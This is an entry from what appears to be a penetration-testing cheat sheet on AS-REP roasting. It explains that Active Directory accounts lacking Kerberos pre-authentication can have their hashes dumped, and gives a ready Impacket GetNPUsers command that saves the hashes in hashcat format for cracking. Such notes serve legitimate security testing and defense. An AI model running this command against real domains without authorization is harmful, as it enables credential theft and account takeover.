killchain-compendium/Enumeration/AS-REP Roasting.md

AS-Rep Roating

AS-Rep Roasting dumps user accounts which did not enable pre-authentication. This is somewhat similar to Kerberoasting but includes user accounts as well.

Usage

Impacket got GetNPUsers to check non pre-authenticated user accounts and find credentials.

impacket-GetNPUsers $TARGET_DOMAIN/ -dc-ip $TARGET_DC_IP -usersfile $USERS_FILE  -format hashcat -outputfile hashes.txt -no-pass